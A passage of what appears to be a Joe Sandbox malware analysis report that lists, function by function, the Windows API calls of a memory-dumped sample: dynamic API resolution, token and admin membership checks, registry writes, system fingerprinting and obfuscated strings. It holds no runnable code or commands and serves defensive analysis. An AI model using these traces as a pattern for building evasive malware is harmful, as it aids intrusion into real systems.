GetShellWindow.USER32 ref: 0040EB8D
LoadLibraryA.KERNEL32(00000000), ref: 0040EBBE
GetProcAddress.KERNEL32(00000000,?,00000000), ref: 0040EBC5
GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 0040EBD6
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040EBDD
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0040EC3C
HeapFree.KERNEL32(00000000,?,00000000), ref: 0040EC3F
GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0040EC48
HeapFree.KERNEL32(00000000,?,00000000), ref: 0040EC4B
GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0040EC5F
HeapFree.KERNEL32(00000000,?,00000000), ref: 0040EC66

Strings

60Z5, xrefs: 0040EADA
[##', xrefs: 0040EB57
5WGK5, xrefs: 0040EBAA
dD6q5S, xrefs: 0040EB41

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040E6ED, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 138

APIs

GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,00401A31), ref: 0040E6FD
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E703
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E70E

Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,001CFDA8), ref: 004073EF
Part of subcall function 004073B6: HeapAlloc.KERNEL32(00000000), ref: 004073F2
Part of subcall function 004073B6: GetLogicalDrives.KERNEL32 ref: 00407406
Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00407460
Part of subcall function 004073B6: HeapAlloc.KERNEL32(00000000), ref: 00407463
Part of subcall function 004073B6: IsSystemResumeAutomatic.KERNEL32 ref: 00407477
Part of subcall function 004073B6: GetModuleHandleA.KERNEL32(00000000,?), ref: 004074A8
Part of subcall function 004073B6: GetProcAddress.KERNEL32(00000000), ref: 004074AF
Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004074BE
Part of subcall function 004073B6: HeapFree.KERNEL32(00000000), ref: 004074C7
Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000000,?), ref: 004074CC
Part of subcall function 004073B6: HeapFree.KERNEL32(00000000), ref: 004074CF

Part of subcall function 0040E684: GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
Part of subcall function 0040E684: GetProcAddress.KERNEL32(00000000), ref: 0040E6C4

GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00401A31), ref: 0040E72D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x), ref: 0040E736
GetComputerNameW.KERNEL32(00000000,?), ref: 0040E751
GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0040E78C
HeapAlloc.KERNEL32(00000000), ref: 0040E78F
GetClipboardOwner.USER32 ref: 0040E79C
lstrcpyW.KERNEL32(00000000), ref: 0040E7CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E7DE
HeapFree.KERNEL32(00000000), ref: 0040E7E1

Part of subcall function 0040E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0040E7ED,?), ref: 0040E39F
Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0040E3B7
Part of subcall function 0040E310: HeapAlloc.KERNEL32(00000000), ref: 0040E3BE
Part of subcall function 0040E310: RegQueryValueExA.ADVAPI32(0040E7ED,?,00000000,00000000,00000000,?), ref: 0040E3EB
Part of subcall function 0040E310: RegQueryValueExA.ADVAPI32(0040E7ED,74736E49,00000000,00000000,?,00000004), ref: 0040E411
Part of subcall function 0040E310: RegQueryValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000000,?,00000004), ref: 0040E43F
Part of subcall function 0040E310: GetTickCount.KERNEL32 ref: 0040E445
Part of subcall function 0040E310: RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E451
Part of subcall function 0040E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0040E7ED), ref: 0040E467
Part of subcall function 0040E310: RegSetValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000004,?,00000004), ref: 0040E482
Part of subcall function 0040E310: RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E499
Part of subcall function 0040E310: lstrlenA.KERNEL32(00000008), ref: 0040E4A5
Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E4CB
Part of subcall function 0040E310: HeapAlloc.KERNEL32(00000000), ref: 0040E4D2
Part of subcall function 0040E310: GetComputerNameA.KERNEL32(00000000,00000004), ref: 0040E4DF
Part of subcall function 0040E310: lstrlenA.KERNEL32(00000000), ref: 0040E4E6
Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E503
Part of subcall function 0040E310: HeapFree.KERNEL32(00000000), ref: 0040E510
Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E517
Part of subcall function 0040E310: HeapFree.KERNEL32(00000000), ref: 0040E51E

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E80F
CheckTokenMembership.ADVAPI32(00000000,?,00401A31), ref: 0040E82A
FreeSid.ADVAPI32(?), ref: 0040E836

Part of subcall function 0040E967: GetCurrentProcess.KERNEL32(00020008,0040E84F), ref: 0040E984
Part of subcall function 0040E967: OpenProcessToken.ADVAPI32(00000000), ref: 0040E98B
Part of subcall function 0040E967: GetTokenInformation.ADVAPI32(0040E84F,00000014,00000000,00000004,?), ref: 0040E9A4
Part of subcall function 0040E967: CloseHandle.KERNEL32(0040E84F), ref: 0040E9AD

CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00401A31), ref: 0040E866
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0040E87C

Part of subcall function 0040E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0040F1FF), ref: 0040E8A6
Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,?,?,?,0040F1FF), ref: 0040E8C2
Part of subcall function 0040E897: GetLastError.KERNEL32(?,0040F1FF), ref: 0040E8D0
Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0040F1FF), ref: 0040E8E1
Part of subcall function 0040E897: HeapAlloc.KERNEL32(00000000,?,0040F1FF), ref: 0040E8E8
Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,?,?,?,0040F1FF), ref: 0040E901
Part of subcall function 0040E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0040F1FF), ref: 0040E90D
Part of subcall function 0040E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0040F1FF), ref: 0040E924
Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0040F1FF), ref: 0040E946
Part of subcall function 0040E897: HeapFree.KERNEL32(00000000,?,0040F1FF), ref: 0040E94D
Part of subcall function 0040E897: CloseHandle.KERNEL32(?), ref: 0040E957

Strings

367D, xrefs: 0040E764
f6yD, xrefs: 0040E77F

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00403950, Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 116

APIs

GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00403971
GetProcessHeap.KERNEL32(00000008,00000025), ref: 004039B0
HeapAlloc.KERNEL32(00000000), ref: 004039B7
GetCurrentProcessId.KERNEL32 ref: 004039C8
GetProcessHeap.KERNEL32(00000008,00000051), ref: 00403A72
HeapAlloc.KERNEL32(00000000), ref: 00403A79
GetForegroundWindow.USER32 ref: 00403A8A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403AC8
HeapFree.KERNEL32(00000000), ref: 00403ACF

Strings

!c5Y, xrefs: 00403A2B
gW, xrefs: 0040399F
F$cP, xrefs: 00403A5A
6X2g, xrefs: 00403991
hj, xrefs: 00403A90
SgWA, xrefs: 004039A5
ScPYiF, xrefs: 00403AA0
%A=S, xrefs: 00403998
X, xrefs: 004039AC
Y, xrefs: 00403A61

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004078D6, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 100

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 0040790B
HeapAlloc.KERNEL32(00000000), ref: 0040790E
GetShellWindow.USER32 ref: 00407923
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040797E
HeapAlloc.KERNEL32(00000000), ref: 00407981
GetDoubleClickTime.USER32 ref: 00407995
GetModuleHandleA.KERNEL32(Fz@), ref: 004079C5
GetProcAddress.KERNEL32(00000000,00000000), ref: 004079CD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004079E8
HeapFree.KERNEL32(00000000), ref: 004079F5
GetProcessHeap.KERNEL32(00000000,Fz@), ref: 004079FA
HeapFree.KERNEL32(00000000), ref: 00407A01

Strings

Fz@, xrefs: 004079D3
4g, xrefs: 0040796B
+, xrefs: 00407964
[##', xrefs: 004078EC
Fz@, xrefs: 004079C1, 004079C4, 004079F7
5WGK5, xrefs: 00407940

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00404AB4, Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 119

APIs

OpenProcess.KERNEL32(00000400,00000000), ref: 00404AFF
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00404B21
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404B58
HeapAlloc.KERNEL32(00000000), ref: 00404B5F
GetForegroundWindow.USER32 ref: 00404B70
wsprintfA.USER32 ref: 00404BAD
FindAtomA.KERNEL32(?), ref: 00404BBD
GlobalFindAtomA.KERNEL32(?), ref: 00404BD2
GlobalAddAtomA.KERNEL32(?), ref: 00404BE4
AddAtomA.KERNEL32(?), ref: 00404BF1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404BFD
HeapFree.KERNEL32(00000000), ref: 00404C04
CloseHandle.KERNEL32(?), ref: 00404C0D

Strings

IkD, xrefs: 00404B32
l, xrefs: 00404B47
liFaL3, xrefs: 00404B8D
cQtK, xrefs: 00404B40

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040B9E6, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 114

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0040BA29
HeapAlloc.KERNEL32(00000000), ref: 0040BA2C
GetShellWindow.USER32 ref: 0040BA40
GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040BA9F
HeapAlloc.KERNEL32(00000000), ref: 0040BAA2
GetMessageTime.USER32 ref: 0040BAB6
GetModuleHandleA.KERNEL32(?,00000000), ref: 0040BAE7
GetProcAddress.KERNEL32(00000000), ref: 0040BAEE

Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000208,0041CAA8), ref: 00403E3F
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403E42
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00403ED2
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403ED9
Part of subcall function 00403E17: GetTickCount.KERNEL32 ref: 00403EED
Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403F24
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403F6E
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403F71
Part of subcall function 00403E17: GetCaretBlinkTime.USER32 ref: 00403F86
Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403FC8
Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0040401D
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0040402C
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040402F
Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00404051
Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 00404077
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00404099
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040409C
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 004040AE
Part of subcall function 00403E17: HeapReAlloc.KERNEL32(00000000), ref: 004040B1
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004040D5
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040D8
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 004040E4
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040ED
Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 004040FC
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00404107
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 0040410A
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00404112
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 00404115

Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BB23
HeapFree.KERNEL32(00000000), ref: 0040BB2C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040BB31
HeapFree.KERNEL32(00000000), ref: 0040BB34

Strings

08, xrefs: 0040BA84
JJ, xrefs: 0040BA99
'5, xrefs: 0040BA18
[##', xrefs: 0040BA0A
bKTU, xrefs: 0040BA92

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00404C1F, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 111

APIs

GetProcessHeap.KERNEL32(00000008,00000010), ref: 00404C65
HeapAlloc.KERNEL32(00000000), ref: 00404C68
GetMessageTime.USER32 ref: 00404C7D
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404CD4
HeapAlloc.KERNEL32(00000000), ref: 00404CD7
IsSystemResumeAutomatic.KERNEL32 ref: 00404CEB
GetModuleHandleA.KERNEL32(00000000,?), ref: 00404D1C
GetProcAddress.KERNEL32(00000000), ref: 00404D23
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404D4F
HeapFree.KERNEL32(00000000), ref: 00404D5C
GetProcessHeap.KERNEL32(00000000,?), ref: 00404D61
HeapFree.KERNEL32(00000000), ref: 00404D68

Strings

A, xrefs: 00404C54
qBc2R, xrefs: 00404D08
3!'Q, xrefs: 00404C47
c, xrefs: 00404CC5
daAND4, xrefs: 00404C9A

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040D768, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 100

APIs

GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0040D7EF
HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0040D7F2
GetShellWindow.USER32 ref: 0040D803
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0040D83D
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0040D86B
CloseHandle.KERNEL32 ref: 0040D880
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D88E
HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D891
StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0040D89F
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D8A7
HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D8AA

Strings

?y!3, xrefs: 0040D797
`j y, xrefs: 0040D7C8
*e[j, xrefs: 0040D7B3
ye3jE, xrefs: 0040D820
+ye3, xrefs: 0040D7DD
}j$y, xrefs: 0040D7A5

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040F859, Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 99

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F888
HeapAlloc.KERNEL32(00000000), ref: 0040F88F
GetShellWindow.USER32 ref: 0040F8A1
GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040F905
HeapAlloc.KERNEL32(00000000), ref: 0040F90C
CloseClipboard.USER32 ref: 0040F920
LoadLibraryA.KERNEL32(?), ref: 0040F951
GetProcAddress.KERNEL32(00000000), ref: 0040F958

Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
Part of subcall function 0040F4A9: GetShellWindow.USER32 ref: 0040F4FD
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F560
Part of subcall function 0040F4A9: GetInputState.USER32 ref: 0040F574
Part of subcall function 0040F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
Part of subcall function 0040F4A9: GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5C2
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5CE

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F971
HeapFree.KERNEL32(00000000), ref: 0040F97E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F983
HeapFree.KERNEL32(00000000), ref: 0040F98A

Strings

'5, xrefs: 0040F877
[##', xrefs: 0040F869
>41, xrefs: 0040F8E6
5WGK5, xrefs: 0040F8BE
Q, xrefs: 0040F8F4

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040F4A9, Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 98

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
GetShellWindow.USER32 ref: 0040F4FD
GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
HeapAlloc.KERNEL32(00000000), ref: 0040F560
GetInputState.USER32 ref: 0040F574
GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
HeapFree.KERNEL32(00000000), ref: 0040F5C2
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
HeapFree.KERNEL32(00000000), ref: 0040F5CE

Strings

'5, xrefs: 0040F4CD
s? , xrefs: 0040F545
;?B,, xrefs: 0040F530
[##', xrefs: 0040F4BF
5WGK5, xrefs: 0040F513

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040E0EF, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 175

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,001CFDA8), ref: 0040E140
HeapAlloc.KERNEL32(00000000), ref: 0040E143
GetShellWindow.USER32 ref: 0040E155
GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0040E1BD
HeapAlloc.KERNEL32(00000000), ref: 0040E1C0
ReleaseCapture.USER32 ref: 0040E1D4
LoadLibraryA.KERNEL32(?), ref: 0040E1FE
GetProcAddress.KERNEL32(00000000), ref: 0040E205
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E219
HeapFree.KERNEL32(00000000), ref: 0040E222
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E227
HeapFree.KERNEL32(00000000), ref: 0040E22A
VirtualAlloc.KERNEL32(00000000,7142424B,00003000,00000004), ref: 0040E261
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040E2E1

Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 00407530
Part of subcall function 004074D8: GetMessageTime.USER32 ref: 00407544
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 004075A1
Part of subcall function 004074D8: IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
Part of subcall function 004074D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
Part of subcall function 004074D8: GetProcAddress.KERNEL32(00000000), ref: 004075ED
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 0040760A
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 00407612
Part of subcall function 004074D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
Part of subcall function 004074D8: CloseHandle.KERNEL32(00000000), ref: 0040764D

Part of subcall function 0040E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0040E625
Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0040E634
Part of subcall function 0040E60D: HeapAlloc.KERNEL32(00000000), ref: 0040E63B
Part of subcall function 0040E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0040E654
Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E66D
Part of subcall function 0040E60D: HeapFree.KERNEL32(00000000), ref: 0040E674

Strings

7mUV, xrefs: 0040E1B2
[##', xrefs: 0040E121

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004074D8, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 123

APIs

GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
HeapAlloc.KERNEL32(00000000), ref: 00407530
GetMessageTime.USER32 ref: 00407544
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
HeapAlloc.KERNEL32(00000000), ref: 004075A1
IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
GetProcAddress.KERNEL32(00000000), ref: 004075ED
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
HeapFree.KERNEL32(00000000), ref: 0040760A
GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
HeapFree.KERNEL32(00000000), ref: 00407612
OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
CloseHandle.KERNEL32(00000000), ref: 0040764D

Strings

qBc2, xrefs: 00407593
3!'Q, xrefs: 0040750F

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040765B, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 121

APIs

GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 004076D7
HeapAlloc.KERNEL32(00000000), ref: 004076DA
GetProcessHeap.KERNEL32 ref: 004076EF
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040773B
HeapAlloc.KERNEL32(00000000), ref: 0040773E
IsSystemResumeAutomatic.KERNEL32 ref: 00407752
GetModuleHandleA.KERNEL32(00000000,?), ref: 00407783
GetProcAddress.KERNEL32(00000000), ref: 0040778A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040779E
HeapFree.KERNEL32(00000000), ref: 004077A7
GetProcessHeap.KERNEL32(00000000,?), ref: 004077AC
HeapFree.KERNEL32(00000000), ref: 004077AF

Strings

qBc2, xrefs: 00407730
qxqoVh, xrefs: 00407701
c, xrefs: 0040772C
R, xrefs: 00407737

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004070D8, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 119

APIs

GetProcessHeap.KERNEL32(00000008,00000047), ref: 00407185
HeapAlloc.KERNEL32(00000000), ref: 0040718C
RevertToSelf.ADVAPI32 ref: 004071A5
GetProcessHeap.KERNEL32(00000008,00000006), ref: 004071E8
HeapAlloc.KERNEL32(00000000), ref: 004071EF
GetCurrentProcessId.KERNEL32 ref: 00407203
wsprintfA.USER32 ref: 0040723A
RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00407253
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00407272
RegCloseKey.ADVAPI32(00000000), ref: 0040727B
Sleep.KERNEL32(000003E8), ref: 0040728C

Strings

FzpDO5, xrefs: 004071BB
,&V, xrefs: 00407109
,D, xrefs: 00407172
zoQz, xrefs: 004071DB
uR, xrefs: 004071E2

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040A7D8, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,7142434B,001CFDA8), ref: 0040A845
HeapAlloc.KERNEL32(00000000), ref: 0040A84C
GetMessageExtraInfo.USER32 ref: 0040A868
GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040A8CF
HeapAlloc.KERNEL32(00000000), ref: 0040A8D6
GetDoubleClickTime.USER32 ref: 0040A8EA
LoadLibraryA.KERNEL32(?), ref: 0040A914
GetProcAddress.KERNEL32(00000000), ref: 0040A91B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A94F
HeapFree.KERNEL32(00000000), ref: 0040A95C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040A961
HeapFree.KERNEL32(00000000), ref: 0040A968

Strings

)Z1:, xrefs: 0040A8B3
4ESt, xrefs: 0040A8C4

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040A4DC, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 107

APIs

